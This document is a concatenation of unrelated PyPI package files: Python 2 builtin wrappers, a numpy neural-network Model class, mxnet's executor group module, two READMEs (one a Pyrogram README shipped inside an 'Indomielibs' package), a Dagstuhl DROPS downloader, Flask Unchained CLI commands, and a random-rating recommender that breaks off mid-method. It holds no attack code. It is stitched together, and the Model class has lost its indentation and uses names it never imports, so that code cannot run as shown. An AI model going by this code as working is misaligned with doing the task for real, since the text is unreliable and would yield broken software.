def _set(iterable=marker):
    if iterable is marker:
        iterable = []
    return set(iterable)

def _slice(start=None, stop=0, step=None):
    return slice(start, stop, step)

def _staticmethod(function):
    return staticmethod(function)

def _str(object=''):
    return str(object)

def _super(typ, typ2=marker):
    if typ2 is marker:
        # Bug fix: was `super(type)`, which passed the builtin `type`
        # instead of the caller-supplied class.
        return super(typ)
    return super(typ, typ2)
# Inspectable stand-ins for the builtins tuple..xrange (Python 2 era:
# note `unicode` and `xrange`).
def _tuple(sequence=marker):
    if sequence is marker:
        return tuple()
    return tuple(sequence)

def _type(object_or_name, bases=marker, namespace=marker):
    # One-argument form inspects an object; three-argument form creates a class
    if bases is marker and namespace is marker:
        return type(object_or_name)
    if bases is marker:
        bases = ()
    if namespace is marker:
        namespace = {}
    return type(object_or_name, bases, namespace)

def _unicode(string, encoding=marker, errors=marker):
    if encoding is marker and errors is marker:
        return unicode(string)
    if errors is marker:
        return unicode(string, encoding)
    return unicode(string, encoding, errors)

def _xrange(start=marker, stop=None, step=marker):
    # Mirrors xrange's positional quirk: a single argument is the stop value
    if start is marker and step is marker:
        return xrange(stop)
    if step is marker:
        return xrange(start, stop)
    return xrange(start, stop, step)
##
# A mapping of builtin types to inspectable wrapper functions.
basetypes = {
    # basestring cannot be instantiated
    bool : _bool,
    buffer : _buffer,
    classmethod : _classmethod,
    complex : _complex,
    dict : _dict,
    enumerate : _enumerate,
    file : _file,
    float : _float,
    frozenset : _frozenset,
    int : _int,
    list : _list,
    long : _long,
    object : _object,
    property : _property,
    reversed : _reversed,
    set : _set,
    slice : _slice,
    staticmethod : _staticmethod,
    str : _str,
    super : _super,
    tuple : _tuple,
    type : _type,
    unicode : _unicode,
    xrange : _xrange,
    }
import numpy as np
import math
import Deep_Learning_Framework.layer
import Deep_Learning_Framework.loss
import Deep_Learning_Framework.activations
def change_to_vector(y):
    """Convert one-hot (or score) vectors to class indices.

    Args:
        y: iterable of 1-D arrays/sequences, one score vector per sample.

    Returns:
        list[int]: index of the maximum entry of each vector.
    """
    # Note: a stray debug print(len(y)) was removed from the original.
    return [int(np.argmax(row)) for row in y]
def printvec(x):
    """Print each row of the matrix-like iterable *x* on its own line."""
    for line in x:
        print(line)
class Model:
    """A minimal sequential neural-network model."""

    def __init__(self, training_method):
        """
        Args:
            training_method (str): 'online' (per-sample updates) or 'batch'
                (mini-batch updates); used by fit().
        """
        self.training_method = training_method
        self.layers = []  # ordered list of layers, each providing forward()/backward()
        self.err = 0  # loss accumulated over the current epoch (display purpose)
        self.loss = None  # loss function, set via use()
        self.loss_prime = None  # derivative of the loss, set via use()
        self.losses = []  # recorded loss history
def get_losses(self):
"return losses"
return self.losses
def load(self, layers):
"""takes saved layers and assign them to self.layers"""
for l in layers:
self.layers.append(l)
def save(self):
"""save layers and returns layers list"""
res = []
for l in self.layers:
res.append(l)
return res
# add layer to network
def add(self, layer):
'''
adds layers to the model
:param layer: a NN layer
'''
self.layers.append(layer)
def use(self, loss, loss_prime):
'''
sets the used loss function
:param loss:
:param loss_prime:
:return:
'''
self.loss = loss
self.loss_prime = loss_prime
def predict(self, input_data):
'''
predict X for given input
:param input_data: the input data
:return:
'''
# sample dimension first
samples = len(input_data)
result = []
# run network over all samples
# for i in range(samples):
# forward propagation
# X = input_data[i]
X = input_data
for layer in self.layers:
X = layer.forward(X)
result.append(X)
return result
def train(self, X, Y, learning_rate):
'''
train on sample data
:param X: data sample
:param Y: true values
:param learning_rate: learning rate
'''
for layer in self.layers:
X = layer.forward(X)
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# backward propagation
error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
error = layer.backward(error, learning_rate)
def fit(self, x_train, y_train, epochs, learning_rate):
'''
train the model on the dataset
:param x_train: the training data
:param y_train: the true values
:param epochs: number of epochs
:param learning_rate: the learning rate of the parameters
'''
print(y_train)
# sample dimension first
samples = len(x_train)
# training loop
for i in range(epochs):
self.err = 0
if (self.training_method == 'online'):
for j in range(samples):
# forward propagation
sh_x = list(x_train.shape) # shape of input, can be any dimension
sh_x[0] = 1
X = x_train[j, :] # will cut the first input dimension
X = X.reshape(sh_x) # will make it 1 * (dimensions)
sh_y = list(y_train.shape) # shape of input, can be any dimension
sh_y[0] = 1
Y = y_train[j, :] # will cut the first input dimension
Y = Y.reshape(sh_y) # will make it 1 * (dimensions)
for layer in self.layers:
X = layer.forward(X)
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# backward propagation
error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
error = layer.backward(error, learning_rate)
elif (self.training_method == 'batch'):
batch_size = 100
num_of_batches = max(1, math.ceil(samples / batch_size))
j = 0
for j in range(num_of_batches):
begin_index = j * batch_size
end_index = min(samples, begin_index + batch_size)
current_batch_size = end_index - begin_index
sh_x = list(x_train.shape) # shape of input, can be any dimension
sh_x[0] = current_batch_size
X = x_train[begin_index:end_index, :] # will cut the first input dimension
X = X.reshape(sh_x) # will make it 1 * (dimensions)
# X = x_train[begin_index:end_index , :].reshape(current_batch_size,x_train.shape[1])
sh_y = list(y_train.shape) # shape of input, can be any dimension
sh_y[0] = current_batch_size
Y = y_train[begin_index:end_index, :] # will cut the first input dimension
Y = Y.reshape(sh_y) # will make it 1 * (dimensions)
# Y = y_train[begin_index:end_index , : ].reshape(current_batch_size,y_train.shape[1])
for layer in self.layers:
X = layer.forward(X)
print(change_to_vector(X))
print('------------------------------------')
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# lo = CrossEntropyLoss()
# self.err += lo.forward(X,Y)
# backward propagation
# error = None
error = self.loss_prime(X, Y)
is_softmax = False
if (isinstance(self.layers[-1], ActivationLayer)):
if (id(self.layers[-1].activation) == id(softmax)):
l = Loss()
error = l.softmax_grad(X, Y)
is_softmax = True
else:
error = self.loss_prime(X, Y)
# error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
if (is_softmax):
is_softmax = False
continue
error = layer.backward(error, learning_rate)
# calculate average error on all samples
self.err /= samples
print('epoch %d/%d error=%f' % (i + 1, epochs, self.err))
self.losses.append(self.err) | PypiClean |
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/mxnet/module/executor_group.py | """Executor group is a convenient tool for managing a group of executors."""
import numpy as np
import logging
from .. import context as ctx
from .. import ndarray as nd
from ..base import mx_real_t
from ..executor_manager import _split_input_slice, _load_data, _load_label
def _merge_multi_context(outputs):
    """Concatenate per-device output lists so that each output appears to
    live on a single context.
    """
    merged = []
    for per_device in outputs:
        merged.append(nd.concatenate(per_device, always_copy=False))
    return merged
class DataParallelExecutorGroup(object):
    """DataParallelExecutorGroup is a group of executors that lives on a group of devices.
    This is a helper class used to implement data parallelization. Each mini-batch will
    be split and run on the devices.
    Parameters
    ----------
    symbol : Symbol
        The common symbolic computation graph for all executors.
    contexts : list
        A list of contexts.
    workload : list
        If not `None`, could be a list of numbers that specify the workload to be assigned
        to different context. Larger number indicate heavier workload.
    data_shapes : list
        Should be a list of (name, shape) tuples, for the shapes of data. Note the order is
        important and should be the same as the order that the `DataIter` provide the data.
    label_shapes : list
        Should be a list of (name, shape) tuples, for the shapes of label. Note the order is
        important and should be the same as the order that the `DataIter` provide the label.
    param_names : list
        A list of strings, indicating the names of parameters (e.g. weights, filters, etc.)
        in the computation graph.
    for_training : bool
        Indicate whether the executors should be bind for training. When not doing training,
        the memory for gradients will not be allocated.
    inputs_need_grad : bool
        Indicate whether the gradients for the input data should be computed. This is currently
        not used. It will be useful for implementing composition of modules.
    shared_group : DataParallelExecutorGroup
        Default is `None`. This is used in bucketing. When not `None`, it should be a executor
        group corresponding to a different bucket. In other words, it will correspond to a different
        symbol but with the same set of parameters (e.g. unrolled RNNs with different lengths).
        In this case, many memory will be shared.
    input_types : list
        Default is `None`. When not `None`, can be used to specify the data type for each
        of the data/label inputs.
    logger : Logger
        Default is `logging`.
    """
    def __init__(self, symbol, contexts, workload, data_shapes, label_shapes, param_names,
                 for_training, inputs_need_grad, shared_group=None, input_types=None,
                 logger=logging):
        self.param_names = param_names
        self.arg_names = symbol.list_arguments()
        self.aux_names = symbol.list_auxiliary_states()
        self.symbol = symbol
        self.contexts = contexts
        self.workload = workload
        self.for_training = for_training
        self.inputs_need_grad = inputs_need_grad
        self.input_types = input_types
        self.logger = logger
        if shared_group is not None:
            # bucketing: re-use the data blobs of the shared group's executors
            self.shared_data_arrays = shared_group.shared_data_arrays
        else:
            # one name -> NDArray dict per device
            self.shared_data_arrays = [{} for _ in contexts]
        # initialize some instance variables
        self.batch_size = None
        self.slices = None
        self.execs = None
        self.data_arrays = None
        self.label_arrays = None
        self.param_arrays = None
        self.grad_arrays = None
        self.aux_arrays = None
        # calculate workload and bind executors
        self.decide_slices(data_shapes)
        self.bind_exec(data_shapes, label_shapes, shared_group)
    def decide_slices(self, data_shapes):
        """Decide the slices for each context according to the workload.
        Parameters
        ----------
        data_shapes : list
            list of (name, shape) specifying the shapes for the input data.
        """
        assert len(data_shapes) > 0
        # batch size is the first dimension of the first data input
        self.batch_size = data_shapes[0][1][0]
        for shape in data_shapes:
            assert shape[1][0] == self.batch_size, "all the data must have the same batch size"
        self.slices = _split_input_slice(self.batch_size, self.workload)
    def bind_exec(self, data_shapes, label_shapes, shared_group):
        """Bind executors on their respective devices.
        Parameters
        ----------
        data_shapes : list
        label_shapes : list
        shared_group : DataParallelExecutorGroup
        """
        self.execs = []
        for i in range(len(self.contexts)):
            self.execs.append(self._bind_ith_exec(i, data_shapes, label_shapes, shared_group))
        # convenient data structures
        # data_arrays[k][i] is (batch slice, device NDArray) for input k on device i
        self.data_arrays = [[(self.slices[i], e.arg_dict[name]) for i, e in enumerate(self.execs)]
                            for name, _ in data_shapes]
        if label_shapes is not None:
            self.label_arrays = [[(self.slices[i], e.arg_dict[name])
                                  for i, e in enumerate(self.execs)]
                                 for name, _ in label_shapes]
        else:
            self.label_arrays = None
        # param_arrays[k][i] is the k-th parameter's NDArray on device i
        self.param_arrays = [[exec_.arg_arrays[i] for exec_ in self.execs]
                             for i, name in enumerate(self.arg_names)
                             if name in self.param_names]
        if self.for_training:
            self.grad_arrays = [[exec_.grad_arrays[i] for exec_ in self.execs]
                                for i, name in enumerate(self.arg_names)
                                if name in self.param_names]
        else:
            self.grad_arrays = None
        data_names = [x[0] for x in data_shapes]
        if self.inputs_need_grad:
            self.input_grad_arrays = [[exec_.grad_arrays[i] for exec_ in self.execs]
                                      for i, name in enumerate(self.arg_names)
                                      if name in data_names]
        else:
            self.input_grad_arrays = None
        self.aux_arrays = [[exec_.aux_arrays[i] for exec_ in self.execs]
                           for i in range(len(self.aux_names))]
    def set_params(self, arg_params, aux_params):
        """Assign, i.e. copy parameters to all the executors.
        Parameters
        ----------
        arg_params : dict
            A dictionary of name to `NDArray` parameter mapping.
        aux_params : dict
            A dictionary of name to `NDArray` auxiliary variable mapping.
        """
        for exec_ in self.execs:
            exec_.copy_params_from(arg_params, aux_params)
    def get_params(self, arg_params, aux_params):
        """ Copy data from each executor to `arg_params` and `aux_params`.
        Parameters
        ----------
        arg_params : list of NDArray
            target parameter arrays
        aux_params : list of NDArray
            target aux arrays
        Notes
        -----
        - This function will inplace update the NDArrays in arg_params and aux_params.
        """
        # average each parameter across devices on CPU, then write it back
        for name, block in zip(self.param_names, self.param_arrays):
            weight = sum(w.copyto(ctx.cpu()) for w in block) / len(block)
            weight.astype(arg_params[name].dtype).copyto(arg_params[name])
        for name, block in zip(self.aux_names, self.aux_arrays):
            weight = sum(w.copyto(ctx.cpu()) for w in block) / len(block)
            weight.astype(aux_params[name].dtype).copyto(aux_params[name])
    def forward(self, data_batch, is_train=None):
        """Split `data_batch` according to workload and run forward on each devices.
        Parameters
        ----------
        data_batch : DataBatch
            Or could be any object implementing similar interface.
        is_train : bool
            The hint for the backend, indicating whether we are during training phase.
            Default is `None`, then the value `self.for_training` will be used.
        Returns
        -------
        """
        _load_data(data_batch, self.data_arrays)
        if is_train is None:
            is_train = self.for_training
        if is_train:
            # It could be the case that even though we are binded for training, we
            # still do not have label arrays. For example, this could happen if we
            # are using a module without a loss function (the user will compute the
            # loss and gradients using some other ways), and we do not need the label
            # here.
            if self.label_arrays is not None:
                _load_label(data_batch, self.label_arrays)
        for exec_ in self.execs:
            exec_.forward(is_train=is_train)
    def get_output_shapes(self):
        """Get the shapes of the outputs."""
        outputs = self.execs[0].outputs
        shapes = [out.shape for out in outputs]
        # per-device outputs only hold a slice; report the full batch size
        shapes = [tuple([self.batch_size] + list(shape[1:])) for shape in shapes]
        return zip(self.symbol.list_outputs(), shapes)
    def get_outputs(self, merge_multi_context=True):
        """Get outputs of the previous forward computation.
        Parameters
        ----------
        merge_multi_context : bool
            Default is `True`. In the case when data-parallelism is used, the outputs
            will be collected from multiple devices. A `True` value indicate that we
            should merge the collected results so that they look like from a single
            executor.
        Returns
        -------
        If `merge_multi_context` is `True`, it is like `[out1, out2]`. Otherwise, it
        is like `[[out1_dev1, out1_dev2], [out2_dev1, out2_dev2]]`. All the output
        elements are `NDArray`.
        """
        outputs = [[exec_.outputs[i] for exec_ in self.execs]
                   for i in range(len(self.execs[0].outputs))]
        if merge_multi_context:
            outputs = _merge_multi_context(outputs)
        return outputs
    def get_input_grads(self, merge_multi_context=True):
        """Get the gradients with respect to the inputs of the module.
        Parameters
        ----------
        merge_multi_context : bool
            Default is `True`. In the case when data-parallelism is used, the outputs
            will be collected from multiple devices. A `True` value indicate that we
            should merge the collected results so that they look like from a single
            executor.
        Returns
        -------
        If `merge_multi_context` is `True`, it is like `[grad1, grad2]`. Otherwise, it
        is like `[[grad1_dev1, grad1_dev2], [grad2_dev1, grad2_dev2]]`. All the output
        elements are `NDArray`.
        """
        assert self.inputs_need_grad
        if merge_multi_context:
            return _merge_multi_context(self.input_grad_arrays)
        return self.input_grad_arrays
    def backward(self, out_grads=None):
        """Run backward on all devices. A backward should be called after
        a call to the forward function. Backward cannot be called unless
        `self.for_training` is `True`.
        Parameters
        ----------
        out_grads : NDArray or list of NDArray, optional
            Gradient on the outputs to be propagated back.
            This parameter is only needed when bind is called
            on outputs that are not a loss function.
        """
        assert self.for_training, 're-bind with for_training=True to run backward'
        if out_grads is None:
            out_grads = []
        # each device only receives the slice of out_grads matching its batch slice
        for i, (exec_, islice) in enumerate(zip(self.execs, self.slices)):
            out_grads_slice = [grad[islice].as_in_context(self.contexts[i])
                               for grad in out_grads]
            exec_.backward(out_grads=out_grads_slice)
    def update_metric(self, eval_metric, labels):
        """Accumulate the performance according to `eval_metric` on all devices.
        Parameters
        ----------
        eval_metric : EvalMetric
            The metric used for evaluation.
        labels : list of NDArray
            Typically comes from `label` of a `DataBatch`.
        """
        for texec, islice in zip(self.execs, self.slices):
            labels_slice = [label[islice] for label in labels]
            eval_metric.update(labels_slice, texec.outputs)
    def _bind_ith_exec(self, i, data_shapes, label_shapes, shared_group):
        """Internal utility function to bind the i-th executor.
        """
        data_shapes = self._sliced_shape(data_shapes, i)
        if label_shapes is not None:
            label_shapes = self._sliced_shape(label_shapes, i)
        shared_exec = None if shared_group is None else shared_group.execs[i]
        context = self.contexts[i]
        shared_data_arrays = self.shared_data_arrays[i]
        input_shapes = dict(data_shapes)
        if label_shapes is not None:
            input_shapes.update(dict(label_shapes))
        arg_shapes, _, aux_shapes = self.symbol.infer_shape(**input_shapes)
        assert arg_shapes is not None, "shape inference failed"
        if self.input_types is None:
            # default every input to the default real type
            input_types = {k: mx_real_t for k in input_shapes.keys()}
        else:
            input_types = self.input_types
        arg_types, _, aux_types = self.symbol.infer_type(**input_types)
        assert arg_types is not None, "type inference failed"
        data_names = [x[0] for x in data_shapes]
        arg_arrays = []
        grad_arrays = {} if self.for_training else None
        grad_req = {}
        # parameters get 'write' gradients; data only when inputs_need_grad;
        # everything else (labels etc.) gets 'null'
        for name in self.arg_names:
            if self.for_training:
                if name in self.param_names:
                    grad_req[name] = 'write'
                elif name in data_names:
                    grad_req[name] = 'write' if self.inputs_need_grad else 'null'
                else:
                    grad_req[name] = 'null'
            else:
                grad_req[name] = 'null'
        def _get_or_reshape(name, shared_data_arrays, arg_shape, arg_type, context, logger):
            """Internal helper to get a memory block or re-use by re-shaping"""
            if name in shared_data_arrays:
                arg_arr = shared_data_arrays[name]
                if np.prod(arg_arr.shape) >= np.prod(arg_shape):
                    # nice, we can directly re-use this data blob
                    assert arg_arr.dtype == arg_type
                    arg_arr = arg_arr.reshape(arg_shape)
                else:
                    logger.warning(('bucketing: data "%s" has a shape %s' % (name, arg_shape)) +
                                   (', which is larger than already allocated ') +
                                   ('shape %s' % (arg_arr.shape,)) +
                                   ('. Need to re-allocate. Consider putting ') +
                                   ('default_bucket_key to') +
                                   (' be the bucket taking the largest input for better ') +
                                   ('memory sharing.'))
                    arg_arr = nd.zeros(arg_shape, context, dtype=arg_type)
                    # replace existing shared array because the new one is bigger
                    shared_data_arrays[name] = arg_arr
            else:
                arg_arr = nd.zeros(arg_shape, context, dtype=arg_type)
                shared_data_arrays[name] = arg_arr
            return arg_arr
        # create or borrow arguments and gradients
        for j in range(len(self.arg_names)):
            name = self.arg_names[j]
            if name in self.param_names:  # model parameter
                if shared_exec is None:
                    arg_arr = nd.zeros(arg_shapes[j], context, dtype=arg_types[j])
                    if grad_req[name] != 'null':
                        grad_arr = nd.zeros(arg_shapes[j], context, dtype=arg_types[j])
                        grad_arrays[name] = grad_arr
                else:
                    # bucketing: parameters are shared with the other bucket's executor
                    arg_arr = shared_exec.arg_dict[name]
                    assert arg_arr.shape == arg_shapes[j]
                    assert arg_arr.dtype == arg_types[j]
                    if grad_req[name] != 'null':
                        grad_arrays[name] = shared_exec.grad_dict[name]
            else:  # data or label
                arg_arr = _get_or_reshape(name, shared_data_arrays, arg_shapes[j], arg_types[j],
                                          context, self.logger)
                # data might also need grad if inputs_need_grad is True
                if grad_req[name] != 'null':
                    grad_arrays[name] = _get_or_reshape('grad of ' + name, shared_data_arrays,
                                                        arg_shapes[j], arg_types[j], context,
                                                        self.logger)
            arg_arrays.append(arg_arr)
        # create or borrow aux variables
        if shared_exec is None:
            aux_arrays = [nd.zeros(s, context, dtype=t) for s, t in zip(aux_shapes, aux_types)]
        else:
            for j, arr in enumerate(shared_exec.aux_arrays):
                assert aux_shapes[j] == arr.shape
                assert aux_types[j] == arr.dtype
            aux_arrays = shared_exec.aux_arrays[:]
        executor = self.symbol.bind(ctx=context, args=arg_arrays,
                                    args_grad=grad_arrays, aux_states=aux_arrays,
                                    grad_req=grad_req, shared_exec=shared_exec)
        return executor
    def _sliced_shape(self, shapes, i):
        """Get the sliced shapes for the i-th executor.
        Parameters
        ----------
        shapes : list of (str, tuple)
            The original (name, shape) pairs.
        i : int
            Which executor we are dealing with.
        """
        # replace the batch dimension with the size of this device's slice
        return [(k, tuple([self.slices[i].stop-self.slices[i].start] + list(v[1:])))
                for k, v in shapes]
/MeNLP-2023.4.19.14.13.51.tar.gz/MeNLP-2023.4.19.14.13.51/README.rst | =====
menlp
=====
.. image:: https://img.shields.io/pypi/v/menlp.svg
:target: https://pypi.python.org/pypi/menlp
.. image:: https://img.shields.io/travis/yuanjie-ai/menlp.svg
:target: https://travis-ci.com/yuanjie-ai/menlp
.. image:: https://readthedocs.org/projects/menlp/badge/?version=latest
:target: https://menlp.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
Create a Python package.
* Free software: MIT license
* Documentation: https://menlp.readthedocs.io.
Features
--------
* TODO
Credits
-------
This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template.
.. _Cookiecutter: https://github.com/audreyr/cookiecutter
.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage
| PypiClean |
/Indomielibs-2.0.106.tar.gz/Indomielibs-2.0.106/README.md | <p align="center">
<a href="https://github.com/pyrogram/pyrogram">
<img src="https://docs.pyrogram.org/_static/pyrogram.png" alt="Pyrogram" width="128">
</a>
<br>
<b>Telegram MTProto API Framework for Python</b>
<br>
<a href="https://pyrogram.org">
Homepage
</a>
•
<a href="https://docs.pyrogram.org">
Documentation
</a>
•
<a href="https://docs.pyrogram.org/releases">
Releases
</a>
•
<a href="https://t.me/pyrogram">
News
</a>
</p>
## Pyrogram
> Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots
``` python
from pyrogram import Client, filters
app = Client("my_account")
@app.on_message(filters.private)
async def hello(client, message):
await message.reply("Hello from Pyrogram!")
app.run()
```
**Pyrogram** is a modern, elegant and asynchronous [MTProto API](https://docs.pyrogram.org/topics/mtproto-vs-botapi)
framework. It enables you to easily interact with the main Telegram API through a user account (custom client) or a bot
identity (bot API alternative) using Python.
### Support
If you'd like to support Pyrogram, you can consider:
- [Become a GitHub sponsor](https://github.com/sponsors/delivrance).
- [Become a LiberaPay patron](https://liberapay.com/delivrance).
- [Become an OpenCollective backer](https://opencollective.com/pyrogram).
### Key Features
- **Ready**: Install Pyrogram with pip and start building your applications right away.
- **Easy**: Makes the Telegram API simple and intuitive, while still allowing advanced usages.
- **Elegant**: Low-level details are abstracted and re-presented in a more convenient way.
- **Fast**: Boosted up by [TgCrypto](https://github.com/pyrogram/tgcrypto), a high-performance cryptography library written in C.
- **Type-hinted**: Types and methods are all type-hinted, enabling excellent editor support.
- **Async**: Fully asynchronous (also usable synchronously if wanted, for convenience).
- **Powerful**: Full access to Telegram's API to execute any official client action and more.
### Installing
``` bash
pip3 install pyrogram
```
### Resources
- Check out the docs at https://docs.pyrogram.org to learn more about Pyrogram, get started right
away and discover more in-depth material for building your client applications.
- Join the official channel at https://t.me/pyrogram and stay tuned for news, updates and announcements.
| PypiClean |
/ConferenceCorpus-0.1.1.tar.gz/ConferenceCorpus-0.1.1/corpus/datasources/drops.py | from corpus.utils.download import Download
from os import path
import os
import urllib
from corpus.xmlhandler.xmlparser import XMLEntityParser
from corpus.utils.progress import Progress
class DROPS(object):
    '''
    Access to the Dagstuhl Research Online Publication Server (DROPS).
    '''

    def __init__(self, maxCollectionId: int):
        '''
        Constructor

        Args:
            maxCollectionId(int): the maximum collectionId currently published in DROPS
        '''
        self.maxCollectionId = maxCollectionId
        home = path.expanduser("~")
        self.cachedir = f"{home}/.conferencecorpus/drops"
        # exist_ok avoids the race between the existence check and the creation
        os.makedirs(self.cachedir, exist_ok=True)

    def xmlFilepath(self, collectionId):
        '''
        get the xml file path for the given collection

        Args:
            collectionId(int): the id of the collection

        Returns:
            str: the path to the collection's xml file in the cache directory
        '''
        return f"{self.cachedir}/{collectionId}.xml"

    def cache(self, collectionId, baseurl="https://submission.dagstuhl.de/services/metadata/xml/collections", force: bool = False, progress: Progress = None):
        '''
        cache the XML file for the given collectionId

        Args:
            collectionId(int): the id of the volume
            baseurl(str): the base url to download from
            force(bool): if True reload even if already cached
            progress(Progress): optional progress tracker; advanced once per downloaded file
        '''
        cfilepath = self.xmlFilepath(collectionId)
        if Download.needsDownload(cfilepath, force):
            url = f"{baseurl}/{collectionId}"
            try:
                xml = Download.getURLContent(url)
                with open(cfilepath, "w") as xmlfile:
                    xmlfile.write(xml)
                if progress is not None:
                    progress.next()
            except urllib.error.HTTPError as err:
                # missing collections (404) are expected and silently skipped;
                # any other HTTP error is re-raised
                if "HTTP Error 404: Not Found" not in str(err):
                    raise err

    def parse(self, collectionId: int, progress: Progress = None):
        '''
        parse the xml data of the volume with the given collectionId

        Args:
            collectionId(int): the id of the volume
            progress(Progress): optional progress tracker; advanced once per parsed entity

        Yields:
            the parsed XML entities of the volume
        '''
        recordTag = "{https://submission.dagstuhl.de/services/metadata/xml/dagpub.xsd}volume"
        xmlPath = self.xmlFilepath(collectionId)
        namespaces = {'ns0': 'https://submission.dagstuhl.de/services/metadata/xml/dagpub.xsd'}
        xmlPropertyMap = {
            "title": './ns0:title',
            "shortTitle": './ns0:shortTitle',
            "date": './ns0:date',
            "location": './ns0:location',
            'dblp': './ns0:conference/ns0:dblp',
            # fixed: was '.ns0:conference/...' (missing '/'), inconsistent with
            # the sibling XPath expressions above
            'website': './ns0:conference/ns0:website'
        }
        if os.path.exists(xmlPath):
            xmlParser = XMLEntityParser(xmlPath, recordTag)
            for xmlEntity in xmlParser.parse(xmlPropertyMap, namespaces):
                yield xmlEntity
                if progress is not None:
                    progress.next()
/Flask_Unchained-0.9.0-py3-none-any.whl/flask_unchained/commands/unchained.py | from flask_unchained import current_app
from flask_unchained.cli import cli, click, print_table
from ..utils import format_docstring
@cli.group('unchained')
def unchained_group():
    """
    Flask Unchained commands.
    """
    # group container only; the subcommands are registered below via
    # @unchained_group.command()
@unchained_group.command()
def bundles():
    """
    List registered bundles.
    """
    rows = []
    for bundle in current_app.unchained.bundles.values():
        location = f'{bundle.__module__}.{bundle.__class__.__name__}'
        rows.append((bundle.name, location))
    print_table(('Name', 'Location'), rows)
@unchained_group.command()
@click.argument('bundle_name', nargs=1, required=False, default=None)
def config(bundle_name):
    """
    Show current app config (or optionally just the options for a specific bundle).

    BUNDLE_NAME: only show the config options contributed by this bundle.
    """
    # NOTE: the argument description lives in the docstring because Click
    # arguments (unlike options) do not accept a `help` parameter; passing one
    # raises TypeError at import time.
    from ..hooks import ConfigureAppHook

    bundle = current_app.unchained.bundles[bundle_name] if bundle_name else None
    # resolve the subset of config keys contributed by the requested bundle
    bundle_cfg = (ConfigureAppHook(None).get_bundle_config(bundle, current_app.env)
                  if bundle else None)
    header = ('Config Key', 'Value')
    rows = []
    for key, value in current_app.config.items():
        if not bundle or key in bundle_cfg:
            rows.append((key, str(value)))
    print_table(header, rows)
@unchained_group.command()
def extensions():
    """
    List extensions.
    """
    rows = []
    for name, ext in current_app.unchained.extensions.items():
        # extensions may be registered as (extension, deferred-init) tuples
        if isinstance(ext, tuple):
            ext = ext[0]
        rows.append((name, ext.__class__.__name__, ext.__module__))
    rows.sort(key=lambda row: row[0])
    print_table(('Name', 'Class', 'Location'), rows)
@unchained_group.command()
@click.pass_context
def hooks(ctx):
    """
    List registered hooks (in the order they run).
    """
    # imported lazily to avoid circular imports at module load time
    from ..app_factory import AppFactory
    from ..hooks.run_hooks_hook import RunHooksHook
    # build the bundle list the same way the app factory would, so the
    # discovered hooks match what actually runs
    unchained_config = AppFactory().load_unchained_config(ctx.obj.data['env'])
    _, bundles = AppFactory().load_bundles(getattr(unchained_config, 'BUNDLES', []))
    hooks = RunHooksHook(None).collect_from_bundles(bundles)
    header = ('Hook Name',
              'Default Bundle Module(s)',
              'Bundle Module(s) Override Attr',
              'Description')
    rows = []
    for hook in hooks:
        # hooks restricted to exactly one module expose a singular attribute
        bundle_module_names = ([hook.bundle_module_name]
                               if hook.require_exactly_one_bundle_module
                               else hook.bundle_module_names)
        rows.append((
            hook.name,
            # `and/or` idiom: falls back to '(None)' for an empty name list
            bundle_module_names and ', '.join(bundle_module_names) or '(None)',
            hook.bundle_override_module_names_attr or '(None)',
            format_docstring(hook.__doc__) or '(None)',
        ))
    print_table(header, rows)
@unchained_group.command()
def services():
    """
    List services.
    """
    header = ('Name', 'Class', 'Location')
    rows = []
    for name, svc in current_app.unchained.services.items():
        # Classes and functions expose __name__ directly; instances are
        # reported by their class. (The original checked
        # `isinstance(svc, object)` first, which is True for *everything*,
        # so the other branches were dead code.)
        if hasattr(svc, '__name__') and hasattr(svc, '__module__'):
            rows.append((name, svc.__name__, svc.__module__))
        elif hasattr(svc, '__class__'):
            rows.append((name, svc.__class__.__name__, svc.__module__))
        else:
            rows.append((name, str(svc), ''))
    print_table(header, sorted(rows, key=lambda row: row[0]))
/CaseRecommender-1.1.1.tar.gz/CaseRecommender-1.1.1/caserec/recommenders/rating_prediction/random_rec.py | # © 2019. Case Recommender (MIT License)
import numpy as np
from caserec.recommenders.rating_prediction.base_rating_prediction import BaseRatingPrediction
from caserec.utils.extra_functions import timed
__author__ = 'Fernando S. de Aguiar Neto <fsan110792@gmail.com>'
class RandomRec(BaseRatingPrediction):
    def __init__(self, train_file, test_file, uniform=True, output_file=None, sep='\t', output_sep='\t',
                 random_seed=None):
        r"""
        Random recommendation for Rating Prediction

        This algorithm predicts a random rating for each user-item pair in the test set.

        Usage::

            >> RandomRec(train, test).compute()

        :param train_file: File which contains the train set. This file needs to have at least 3 columns
        (user item feedback_value).
        :type train_file: str

        :param test_file: File which contains the test set. This file needs to have at least 3 columns
        (user item feedback_value).
        :type test_file: str, default None

        :param uniform: Indicates whether the ratings are drawn from a uniform sample or not.
        If False, the ratings are drawn from a normal distribution with the same mean and standard deviation
        as the feedback provided in train.
        :type uniform: bool, default True

        :param output_file: File with dir to write the final predictions
        :type output_file: str, default None

        :param sep: Delimiter for input files
        :type sep: str, default '\t'

        :param output_sep: Delimiter for output file
        :type output_sep: str, default '\t'

        :param random_seed: Number of seed. Lock random numbers for reproducibility of experiments.
        :type random_seed: int, default None
        """
        super(RandomRec, self).__init__(train_file=train_file, test_file=test_file, output_file=output_file,
                                        sep=sep, output_sep=output_sep)

        if random_seed is not None:
            np.random.seed(random_seed)

        self.uniform = uniform
        self.recommender_name = 'Random Recommender'

    def predict(self):
        """
        Generate a random prediction for every (user, item) pair in the test set.

        :raises NotImplementedError: if no test file was provided.
        """
        if not self.uniform:
            # standard deviation of all train feedback values, used together
            # with the train mean for the normal distribution below
            feedbacks = []
            for user in self.train_set["users"]:
                for item in self.train_set['items_seen_by_user'][user]:
                    feedbacks.append(self.train_set['feedback'][user][item])
            std = np.std(feedbacks)
        if self.test_file is not None:
            for user in self.test_set['users']:
                for item in self.test_set['feedback'][user]:
                    if self.uniform:
